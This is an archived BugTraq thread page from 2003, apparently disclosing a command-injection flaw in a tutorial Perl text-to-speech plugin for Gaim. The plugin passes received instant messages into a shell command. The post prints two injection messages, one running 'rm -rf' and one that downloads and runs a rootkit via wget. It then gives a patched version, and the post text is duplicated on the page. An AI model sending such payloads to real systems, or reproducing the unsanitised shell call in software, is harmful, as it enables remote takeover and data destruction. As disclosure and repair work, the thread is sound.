BugTraq
Back to list
|
Post reply
Gaim festival plugin exploit
Oct 15 2003 03:29PM
error (error lostinthenoise net)
(1 replies)
It has come to my attention that people have actually used this example
code for a gaim plugin:
AIM::register("Festival TTS", "0.0.1", "goodbye", "");
AIM::print("Perl Says", "Loaded Festival TTS");
AIM::command("idle", "60000") if ($pro ne "Offline");
AIM::add_event_handler("event_im_recv", "synthesize");
sub goodbye {
AIM::print("Module Unloaded", "Unloaded Festival TTS");
}
sub synthesize {
my $string = $_[0];
$string =~ s/\<.*?\>//g;
$string =~ s/\".*\"//;
system("echo \"$string\" | /usr/bin/festival --tts");
}
As taken from:
http://www.webreference.com/perl/tutorial/13/aim_fest_plugin.pl
This has to be one of the most amusing ways to gain a local users
privileges I have ever seen by an "Expert (TM)"
Exploit code?
You have a shell through gaim with that.
Just pass it this message (or really any message for that matter):
Hey, I just wanted to exploit your box, do you mind?"; rm -rf;
Or perhaps:
Hey, grab this root kit for me?";wget http://url/to/rootkit;chmod +x
rootkit;./rootkit
Perhaps someone should ask:
"(Is s/[^\w]//g really that hard to do?!)"
So a fixed version would look like this:
AIM::register("Festival TTS", "0.0.1", "goodbye", "");
AIM::print("Perl Says", "Loaded Festival TTS");
AIM::command("idle", "60000") if ($pro ne "Offline");
AIM::add_event_handler("event_im_recv", "synthesize");
sub goodbye {
AIM::print("Module Unloaded", "Unloaded Festival TTS");
}
sub synthesize {
my $string = $_[0];
$string =~ s/\<.*?\>//g;
$string =~ s/\".*\"//;
$string =~ s/[^\w]//g;
system("echo \"$string\" | /usr/bin/festival --tts");
}
Just a minor comment, nothing special.
--
error <error (at) lostinthenoise (dot) net [email concealed]>
[ reply ]
Re: Gaim festival plugin exploit
Oct 18 2003 01:05AM
HCTITS Security Division (security humancentrictech com)
(2 replies)
Re: Gaim festival plugin exploit
Oct 20 2003 06:09PM
merlyn stonehenge com (Randal L Schwartz)
Re: [Full-Disclosure] Re: Gaim festival plugin exploit
Oct 18 2003 02:58AM
Cael Abal (lists onryou com)
Privacy Statement
Copyright 2010, SecurityFocus
code for a gaim plugin:
AIM::register("Festival TTS", "0.0.1", "goodbye", "");
AIM::print("Perl Says", "Loaded Festival TTS");
AIM::command("idle", "60000") if ($pro ne "Offline");
AIM::add_event_handler("event_im_recv", "synthesize");
sub goodbye {
AIM::print("Module Unloaded", "Unloaded Festival TTS");
}
sub synthesize {
my $string = $_[0];
$string =~ s/\<.*?\>//g;
$string =~ s/\".*\"//;
system("echo \"$string\" | /usr/bin/festival --tts");
}
As taken from:
http://www.webreference.com/perl/tutorial/13/aim_fest_plugin.pl
This has to be one of the most amusing ways to gain a local users
privileges I have ever seen by an "Expert (TM)"
Exploit code?
You have a shell through gaim with that.
Just pass it this message (or really any message for that matter):
Hey, I just wanted to exploit your box, do you mind?"; rm -rf;
Or perhaps:
Hey, grab this root kit for me?";wget http://url/to/rootkit;chmod +x
rootkit;./rootkit
Perhaps someone should ask:
"(Is s/[^\w]//g really that hard to do?!)"
So a fixed version would look like this:
AIM::register("Festival TTS", "0.0.1", "goodbye", "");
AIM::print("Perl Says", "Loaded Festival TTS");
AIM::command("idle", "60000") if ($pro ne "Offline");
AIM::add_event_handler("event_im_recv", "synthesize");
sub goodbye {
AIM::print("Module Unloaded", "Unloaded Festival TTS");
}
sub synthesize {
my $string = $_[0];
$string =~ s/\<.*?\>//g;
$string =~ s/\".*\"//;
$string =~ s/[^\w]//g;
system("echo \"$string\" | /usr/bin/festival --tts");
}
Just a minor comment, nothing special.
--
error <error (at) lostinthenoise (dot) net [email concealed]>
[ reply ]